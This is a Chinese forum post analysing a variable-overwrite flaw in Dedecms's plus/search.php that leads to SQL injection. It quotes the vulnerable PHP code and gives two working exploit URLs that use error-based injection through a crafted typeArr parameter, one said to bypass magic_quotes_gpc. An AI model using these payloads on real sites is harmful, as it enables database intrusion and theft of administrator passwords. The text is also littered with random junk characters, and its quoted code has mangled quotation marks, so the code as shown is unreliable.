微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.6 w5 Q2 f/ v; m D) X% Z
作者: c4rp3nt3r@0x50sec.org' M" M \7 a0 N0 }! ~, ?: l( I8 |
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
6 l! E f* G3 O0 l. w; X, C
, A/ L' q; k8 t; j5 w9 B" V6 U黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧." {9 R5 \* J" `4 q
- e3 W4 q- y. m============
y h9 H* N9 M : e I9 \% K. C- r; [- u
* Q- z. }' U5 oDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码. _5 G/ _5 n/ ?+ p( Q& X
% y' h; E2 y. H. b6 i& d
require_once(dirname(__FILE__).”/../include/common.inc.php”);8 _6 {( g3 m1 U
require_once(DEDEINC.”/arc.searchview.class.php”);
' X) n; J$ |. V+ q7 [ ; E$ r, \, N1 }0 w0 ~% n/ R/ t
$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
8 F; i0 F! P2 c+ m. P% t$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
& c+ s8 H4 n8 v* o2 Q- w6 f4 M+ t: R$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
, f. X9 ]0 j9 H4 \$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;. \ o9 K! E- o4 I
$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;
8 K% N: h- J0 j+ K( b6 z
9 v; s' Y1 d1 E# H* Iif(!isset($orderby)) $orderby=”;
8 G- s$ I0 @8 T; relse $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);: ] v/ m$ a9 Y0 O- |& m; r
6 }8 [+ G: a0 p. Z# {
# C4 l6 \$ D2 l3 m$ G4 W- B
if(!isset($searchtype)) $searchtype = ‘titlekeyword’;$ @4 @: {9 T/ [% c0 y
else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);
8 z! j- Y2 F7 X6 e
# R! A0 i7 _* K0 W/ L. jif(!isset($keyword)){
# ~5 l& L1 w$ O0 Q) @8 T1 S5 S- O7 z if(!isset($q)) $q = ”;
( y1 m! U; G6 P $keyword=$q;
8 @ b0 V2 d6 f$ P1 q}
2 |/ W. b+ ]" k0 I ' x2 ~* x# y0 O+ C
$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));
2 G+ m$ d3 q& w! a, f4 F [7 U # @/ l: f% _" f" [0 u2 L- L
//查找栏目信息
7 x+ V% p' l4 l7 n$ _/ B* b9 fif(empty($typeid))
1 P% `& j0 B4 ~4 R{4 i& r& b7 i2 Q4 v P
$typenameCacheFile = DEDEDATA.’/cache/typename.inc’;" p; X0 j6 Y/ S' m# J. o, ?
if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )
5 m3 Z4 F* f# g0 u {
4 E2 \4 k& ^, R4 W" D $fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);( G# H1 q& G1 K) n
fwrite($fp, “<”.”?php\r\n”);
1 w) v1 j9 I+ B7 `# I- A- \4 r% | $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);
2 ?$ w5 D5 V9 H# U' V4 Q& Z& f" L $dsql->Execute();8 P" A4 U4 W! c+ ]
while($row = $dsql->GetArray())
- G9 J# a3 r& y! ~) U {
2 P0 B$ A# B( W$ c/ b fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);$ D# U \) A% i' u
}: L% l5 |; B D. W' ?* m
fwrite($fp, ‘?’.'>’);
6 [1 J3 Z' \! i+ y% S3 h* A fclose($fp);/ U9 d6 a( O% D; O3 D3 ?
} u+ k( `8 k- I! ?( z% v
//引入栏目缓存并看关键字是否有相关栏目内容
+ C5 B" C2 E' S require_once($typenameCacheFile);
' j3 ^' L6 n) c//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个( [! O: ^. ~5 g4 z$ p
//
, z! m. ^% ~: l/ _0 w5 v- p if(isset($typeArr) && is_array($typeArr))
% r. W+ W. t4 C {" C3 w7 Y1 n6 V' S# G
foreach($typeArr as $id=>$typename)
# ?4 O4 N5 y' @+ }, R, a6 @) C {7 m' H* v2 a+ |. I! g
$ k# R! l( D* H- S: J; X$ X S
<font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过
* G. a# F% b! S. G- j5 i& W2 h4 T" d3 c% O if($keyword != $keywordn)
6 M( e t! d6 v6 N- A {$ ^* j( P- ]; O1 f
$keyword = $keywordn;6 F' M' x$ z j$ g2 K4 @5 h
<font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设3 [. n: e9 J k) P3 p
break;8 i' D' c# [' S8 d# |8 R
}/ J9 _' S' J7 V* q7 }+ ]8 I- E
}% s! V2 P) H7 |2 w2 P
}
+ M# C9 a& J- Z# @}5 q2 P- X% y/ h" d2 \- ?$ c6 ]
然后plus/search.php文件下面定义了一个 Search类的对象 .4 ^3 \ l0 g' H1 ]$ Z( P0 s
在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.0 f1 D G0 w. Y2 o
$this->TypeLink = new TypeLink($typeid);
: X+ W% y% u4 y9 s- R% h
. e4 [7 @3 J" ~4 @TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.6 X \0 U0 B3 r$ ~: h3 J2 W
5 O* K3 Q5 J7 Y" [( | gclass TypeLink
6 N8 W2 c& z. ~2 \{
! f; | _ Q: {2 @ var $typeDir;+ B. m) J; U- c" j
var $dsql;' u3 O- }7 I& {% J: W
var $TypeID;+ O9 X5 `) I: p; X* Q1 f `' F
var $baseDir;
3 b, e2 Q0 w# ` var $modDir;/ y/ t( g+ y# j& Y3 ?
var $indexUrl;) a8 W7 o, V% [. K2 m+ u+ O
var $indexName;7 [8 K: b+ M# ]+ b& G2 H8 A. Y
var $TypeInfos;0 a: T* f2 ^$ i6 Z
var $SplitSymbol;' I8 _) g2 K U4 J1 _
var $valuePosition;$ `) N' z4 A9 f/ V" f4 E
var $valuePositionName;
- A. Q% M1 s6 R( Y var $OptionArrayList;//构造函数///////* R+ F5 G( O, r; E u' Z5 u. _
//php5构造函数8 h2 I3 B# a6 V3 ^# e
function __construct($typeid)+ @5 J& V; A% J" ]* _6 I
{$ f1 G. D S8 h+ D; C
$this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];+ N/ L! N: P, I6 Q
$this->indexName = $GLOBALS['cfg_indexname'];* }# P0 W2 H6 O5 y9 x; M
$this->baseDir = $GLOBALS['cfg_basedir'];. B- h) E% |2 T
$this->modDir = $GLOBALS['cfg_templets_dir'];; e& N1 H/ v. [5 F4 ]7 c \( N
$this->SplitSymbol = $GLOBALS['cfg_list_symbol'];% \7 k; @8 t! f$ a7 N8 U# x% n
$this->dsql = $GLOBALS['dsql'];+ G' ~5 f T: I2 c" Q6 ^7 w
$this->TypeID = $typeid;
' q6 u+ Q' {% f( ^6 n, V $this->valuePosition = ”;
. B- }' K# ?0 I* u/ Q $this->valuePositionName = ”;# A# H: H" ~* R* V# z
$this->typeDir = ”;5 Y# {2 e4 v/ {5 L- U9 J7 ~
$this->OptionArrayList = ”;0 }2 q; h- ]" k7 Y c( F2 c/ `7 N
/ p/ c' C# C9 P* J. i5 z' u/ G' X //载入类目信息
% e" Q: Y: \7 p# N1 E: m ! y6 S" b4 N3 N/ T+ ^
<font color=”Red”>$query = “SELECT tp.*,ch.typename as
4 t2 X4 G2 Q8 j6 [; K2 octypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join& ]2 k; g. `# z
`#@__channeltype` ch% V6 b) ~8 [: I8 t. H. o0 ?
on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿
h! n! `3 @( D n
0 N$ {3 ]+ X* g9 N; |* {/ D if($typeid > 0)4 O1 J. G( W. C( ~, k1 z- c" B( P
{# V' N, s+ U7 _3 z& b! l
$this->TypeInfos = $this->dsql->GetOne($query);
8 _2 D6 I% ~. z+ Y# g, X( e利用代码一 需要 即使magic_quotes_gpc = Off
; F: g+ J6 u) `& Q( g! B
9 N1 c' \ L7 e7 I0 ywww.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
7 O3 ?; x" J2 p- j2 \& t' T
8 _7 C6 U) c; R这只是其中一个利用代码… Search 类的构造函数再往下* @/ o0 F [9 H! e0 Y& H' P7 p& T
' B5 {. U2 `! I- O2 C/ v! K……省略 N( \, S. G6 ]6 c1 f; a
$this->TypeID = $typeid;1 J: u) H& v; n
……省略
5 E( I1 `* f" [' {0 Z+ Iif($this->TypeID==”0″){" i$ a# `# E. C2 o1 U/ [$ U
$this->ChannelTypeid=1;
7 l( V$ K$ I2 P }else{, Q2 f- v1 B- v6 o+ N
$row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
7 }( i) n8 a/ M4 |7 I6 p//现在不鸡肋了吧亲…
# e. z p' f( y4 m2 c3 g; l $this->ChannelTypeid=$row['channeltype'];
: j8 g; }/ A3 ]4 r' t8 U : S7 q# W2 C5 P0 m0 e
}
2 _) m) J, j! s( _- g8 p! n利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.: w0 {6 ^( e; {$ {% K- J9 Q
: j; Z( H/ I1 M/ Y! w2 W+ g+ ]9 Y( Nwww.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
* t8 Y# f/ L" }
q' l) l, @* r1 e如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站) L, c4 u2 Q: @2 \% F2 w3 B
|
发表于 2013-1-19 08:18:56
收藏
支持
反对